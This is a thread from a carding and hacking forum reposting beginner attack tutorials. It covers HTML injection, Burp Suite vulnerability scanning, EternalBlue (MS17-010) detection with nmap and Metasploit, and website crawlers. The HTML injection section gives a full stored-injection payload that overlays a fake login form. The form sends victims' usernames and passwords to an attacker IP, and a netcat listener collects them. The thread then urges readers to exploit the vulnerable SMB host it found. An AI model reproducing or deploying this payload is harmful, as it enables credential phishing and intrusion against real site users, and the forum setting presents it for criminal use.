![]() |
|
[Guide] How to do HTML Injection (Beginner) - Printable Version +- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc) +-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone) +--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home) +--- Thread: [Guide] How to do HTML Injection (Beginner) (/Thread-Guide-How-to-do-HTML-Injection-Beginner) |
[Guide] How to do HTML Injection (Beginner) - NINZA - 05-04-2020 From W3schools HTML is the standard HyperText Markup Language which uses for designing Web pages
![]() HTML Tags HTML tags are element names surrounded by angle brackets. Their two types of tag starting also known as opening tag and end tag also known as a closing tag. ![]() HTML Elements An HTML element usually consists of a start tag and end tag, with the content inserted in between: ![]() HTML Attributes Attributes provide additional information about HTML elements. Attributes generally come in form of name/value pairs like: name=”value” Create a web page using HTML Generally “Notepad” is useful for writing HTML code and save the text file with a .html/.htm extension for example “test.html” then open the saved file using any web browser. To create a simple web page type following code inside notepad and save test.html <!DOCTYPE html> <html> <head> <title> HTML TUTORIALS</title> </head> <body bgcolor="pink"> <br> <center><h2>WELCOME TO HACKING ARTILCES </h2> <br> <p>Author “Raj chandel”</p> </center> </body> </html> 1 2 3 4 5 6 7 8 9 10 11 12 13 <!DOCTYPE html> <html> <head> <title> HTML TUTORIALS</title> </head> <body bgcolor="pink"> <br> <center><h2>WELCOME TO HACKING ARTILCES </h2> <br> <p>Author “Raj chandel”</p> </center> </body> </html> When you will open test.html in a web browser you will see given below image. ![]()
Since the early days of the web, there have been many versions of HTML: Version Year HTML 1991 HTML 2.0 1995 HTML 3.2 1997 HTML 4.01 1999 XHTML 2000 HTML5 2014 To learn more about HTML visit to w3schools.com HTML injection HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized or the output is not encoded and the attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could use element and attributes to submit HTML content. If these methods are provided with untrusted input, then there is a high risk of XSS, specifically an HTML injection one. If strings are not correctly sanitized the problem could lead to XSS based HTML injection. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims. ![]() Their two types of html injection as following:
A stored HTML also was known as Persistence because through this vulnerability the injected malicious script get permanently stored inside the web-server and the application server give out it back to the user when he visits the respective website. Hence when the client will click on payload which appears as an official part of the website, the injected HTML code will get executed by the browser. The most common example is comment option on blogs, which allow the users to POST their comment for the administrator or another user. Example: An example of a web application vulnerable to stored HTML injection which allows users to submit their entry in the blog as shown in the screenshot. Firstly user “raj” had made a normal entry as an attacker which is successfully added in the web server database. ![]() Enter following html code inside the given text area for making HTML attack. <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.104 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div> 1 <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.104 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div> Above HTML code will generate a payload to create a user login page on a targeted web page and forward that credential to attacker’s IP. ![]() You can see given below login page looks valid to the user and get stored inside the web server. ![]() Now when the victim will open the malicious login page he will receive above web page which looks official to him and he will submit his credential in that page. As he will do so the request will be forward on attacker IP address. ![]() nc -vlp 80 1 nc -vlp 80 The attacker will receive users credential as a response on netcat. From the screenshot, you can read username=bee & password=bug Now attacker will use these credential for login. ![]() Reflected HTML The reflected HTML. HTML is also known as Non-Persistence is occurred when the web application responds immediately on user’s input without validating the inputs this lead an attacker to inject browser executable code inside the single HTML response. It’s named as “non-persistent” since the malicious script does not get stored inside the web server, therefore attacker will send the malicious link through phishing to trap the user. The most common applying of this kind of vulnerability is in Search engines in the website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities. Example: Following web page allow a user to submit his first and last name but these text fields are vulnerable to HTML injection. ![]() Now type following html code in the text field given for the first name which creates a link for hackingarticles.in when you click on “RAJ” <h1><a href ="http://www.hackingarticles.in">RAJ</a></h1> 1 <h1><a href ="http://www.hackingarticles.in">RAJ</a></h1> Similarly type following code in the given text field for the last name: <h2>CHANDEL</h2> 1 <h2>CHANDEL</h2> Click on Go tab to execute this as first and last name. ![]() From given screenshot, you can see it has submitted RAJ CHANDEL and the word “RAJ” contains a link for hackingarticles.in when you will click on the link it will forward to hackingarticles.in ![]() Hello friends! Today we are going to use Burp Suite Scanner which is used for website security testing to identify certain vulnerability inside it. It is the first phase for web penetration testing for every security tester. Burp Scanner is a tool for automatically finding security vulnerabilities in web applications. It is designed to be used by security testers and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications. [To see content please register here] 1 [To see content please register here] Let’s Start with burp proxy in order to intercept request between browser and website. From the screenshot, you can perceive that we have forwarded the intercepted data for “an active scan”. Note: Always configure your browser proxy while making use of burp suite to intercept the request. ![]() Through a window alert it will ask to confirm your action for the active scan; press YES to begin the active scan on targeted website. ![]() Issue Activity The issue activity tab contains a sequential record of the Scanner’s activity in finding new issues and updating existing issues. This is useful for various purposes:
![]() Active Scan Queue Active scanning typically involves sending large numbers of requests to the server for each base request that is scanned, and this can be a time-consuming process. When you send requests for active scanning, these are added to the active scan queue, in which they are processed in turn.
![]() Advisory on Cross-site scripting (reflected) It gave your brief detail of vulnerability and idea to exploit it. Issue: Cross-site scripting (reflected) Severity: High Confidence: Certain Host: [To see content please register here] Path: /listproducts.php The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload was submitted in the cat parameter. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application’s response. ![]() Inside the request tab, we will get Inject payload with intercepted data in order to receive the certain response of generated request. In the given image you can observe that it has injected JavaScript inside URL with Cat parameter ![]() As response, we can see the injected payload get submitted inside the database. Now it will generate an alert prompt on the screen when get executed on the website. ![]() Let’s verify it manually on the running website. Execute following script inside URL with cat parameter, As a result, you will receive prompt 1 as an alert window. ![]() Advisory on SQL injection Similarly test for other vulnerability Issue: SQL injection Severity: High Confidence: Firm Host: [To see content please register here] Path: /listproducts.php The cat parameter appears to be vulnerable to SQL injection attacks. The payload ‘ was submitted in the cat parameter, and a database error message was returned. You should review the contents of the error message, and the application’s handling of other input, to confirm whether the vulnerability is present. The database appears to be MySQL. ![]() Under request tab single code (‘) will pass with the cat parameter to break the SQL statement in order to receive database error as a response. ![]() Under the response tab you can read the highlighted text which clearly points towards SQL vulnerability inside the database. ![]() Advisory on Flash cross-domain policy Issue: Flash cross-domain policy Severity: High Confidence: Certain Host: [To see content please register here] Path: /crossdomain.xml The application publishes a Flash cross-domain policy which allows access from any domain. Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk. ![]() Similarly, as above it has generated the request through GET method using crossdomain.xml ![]() It has received a successful response over its GET request, inside highlighted text you can read it has allowed accessing this site from any domain with any port number and security is set as False. In this way, we can see how the burp suite scanner tests the security loopholes in a website. ![]() Hello Friends! As we all know that Microsoft Windows 7 are exploitable by eternal blue with SMBv1. Then Microsoft patches this vulnerability by updating the SMB version. Still, there are a large number of Windows 7 users who didn’t update their system. Now if a security tester wants to separate vulnerable system from update system he requires some scanning to identify a vulnerable system. The eternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144. Target: Windows 7 Attacker: Kali Linux Open the terminal in your Kali Linux and type the following command to download it from GitHub. git clone [To see content please register here] && cd eternal_scanner1 git clone [To see content please register here] && cd eternal_scanner![]() After then when it gets successfully install you need run the script for in the Oder to lunch the scanner on the terminal by typing following: escan Once the scanner is launched inside the terminal further it will ask to enter target IP or you can also add a range of IPs for scanning. We have given only single IP for scanning i.e. 192.168.1.106 as a target. Then it will start scanning and dumb those IP which is vulnerable in given IP range; from the screenshot, you can observe it has dump 192.168.1.106:445 as vulnerable IP with SMB port 445 and save the output inside /root/eternal_scanner/vulnr.txt ![]() When you will open the output file you will observe vulnerable IP as well as the name of exploit “MS17 -010” as shown in the given image. Similarly, you can scan the target using NMAP and Metasploit ![]() Nmap Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code execution vulnerability (ms17-010, a.k.a. EternalBlue). The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware. The script connects to the $IPC tree, executes a transaction on FID 0 and checks if the error “STATUS_INSUFF_SERVER_RESOURCES” is returned to determine if the target is not patched against ms17-010. Additionally, it checks for known error codes returned by patched systems. Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016. The following command will scan the SMB vulnerability using in-built certain scripts and report according to the output result. nmap -T4 -p445 --script vuln 192.168.1.106 1 nmap -T4 -p445 --script vuln 192.168.1.106 You can observe from the given screenshot that port 445 is open and vulnerable. The target is exploitable to MS17-010 moreover Rate of Risk is High which mean it is easily vulnerable. ![]() We can direct scan for SMB vulnerability for MS17-010 using NMAP script using following NMAP command: nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106 1 nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106 From the given screenshot, you will observe that it has only scanned for MS17-010 and found the target is vulnerable against it. From both results of NMAP, we have concluded that the target is vulnerable due to Microsoft SMBv1. ![]() Metasploit Uses information disclosure to determine if MS17-010 has been patched or not. Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0. If the status returned is “STATUS_INSUFF_SERVER_RESOURCES”, the machine does not have the MS17-010 patch. If the machine is missing the MS17-010 patch, the module will check for an existing DoublePulsar (ring 0 shellcode/malware) infection. This module does not require valid SMB credentials in default server configurations. It can log on as the user “\” and connect to IPC$. msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106 msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104 msf auxiliary(smb_ms17_010) > set rport 445 msf auxiliary(smb_ms17_010) > exploit 1 2 3 4 5 msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106 msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104 msf auxiliary(smb_ms17_010) > set rport 445 msf auxiliary(smb_ms17_010) > exploit From the screenshot, you can perceive that the host is vulnerable to MS17-010 Great!!! Now use MS17-010 to exploit your target. ![]() From Wikipedia A Web crawler, sometimes called a spider, is an Internet bot that systematically browses the World Wide Web, typically for the purpose of Web indexing. A Web crawler starts with a list of URLs to visit, called the seeds. As the crawler visits these URLs, it identifies all the hyperlinks in the page and adds them to the list of URLs to visit. If the crawler is performing archiving of websites it copies and saves the information as it goes. The archive is known as the repository and is designed to store and manage the collection of web pages. A repository is similar to any other system that stores data, like a modern-day database. Let’s Begin!! Metasploit This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone. use auxiliary/crawler/msfcrawler msf auxiliary(msfcrawler) > set rhosts [To see content please register here] msf auxiliary(msfcrawler) > exploit1 2 3 use auxiliary/crawler/msfcrawler msf auxiliary(msfcrawler) > set rhosts [To see content please register here] msf auxiliary(msfcrawler) > exploitFrom, the screenshot you can see it has loaded crawler in order to exact hidden file from any website, for example, about.php, jquery contact form, html and etc which is not possible to exact manually from the website using the browser. For information gathering of any website, we can use it. ![]() Httrack HTTrack is a free and open source Web crawler and offline browser, developed by Xavier Roche It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site’s relative link-structure. Type following command inside the terminal httrack [To see content please register here] –O /root/Desktop/file1 httrack [To see content please register here] –O /root/Desktop/fileIt will save the output inside given directory /root/Desktop/file ![]() From given screenshot you can observe this, it has dumb the website information inside it which consist html file as well as JavaScript and jquery. ![]() Black Widow This Web spider utility detects and displays detailed information for a user-selected Web page, and it offers other Web page tools. BlackWidow’s clean, logically tabbed interface is simple enough for intermediate users to follow but offers just enough under the hood to satisfy advanced users. Simply enter your URL of choice and press Go. BlackWidow uses multi-threading to quickly download all files and test the links. The operation takes only a few minutes for small Web sites. You can download it from here. Enter your URL [To see content please register here] in Address field and press Go.![]() Click on start button given on the left side to begin URL scanning and select a folder to save the output file. From the screenshot, you can observe that I had browse C:\Users\RAJ\Desktop\tptl in order to store output file inside it. ![]() When you will open target folder tptl you will get entire data of website either image or content, html file, php file, and JavaScript all are saved in it. ![]() Website Ripper Copier Website Ripper Copier (WRC) is an all-purpose, high-speed website downloader software to save website data. WRC can download website files to a local drive for offline browsing, extract website files of a certain size and type, like the image, video, picture, movie, and music, retrieve a large number of files as a download manager with resumption support, and mirror sites. WRC is also a site link validator, explorer, and tabbed antipop-up Web / offline browser. Website Ripper Copier is the only website downloader tool that can resume broken downloads from HTTP, HTTPS and FTP connections, access password-protected sites, support Web cookies, analyze scripts, update retrieved sites or files, and launch more than fifty retrieval threads You can download it from [To see content please register here] .Choose “websites for offline browsing” option. ![]() Enter the website URL as [To see content please register here] and click on next.![]() Mention directory path to save the output result and click run now. ![]() When you will open selected folder tp you will get fetched CSS,php,html and js file inside it. ![]() Burp Suite Spider Burp Spider is a tool for automatically crawling web applications. While it is generally preferable to map applications manually, you can use Burp Spider to partially automate this process for very large applications, or when you are short of time. For more detail read our previous articles from [To see content please register here] .From given screenshot you can observe that I had fetched the http request of [To see content please register here] ; now send to spider with help of action tab.![]() The targeted website has been added inside the site map under the target tab as a new scope for web crawling. From the screenshot, you can see it started web crawling of the target website where it has collected the website information in the form of php, html, and js.
|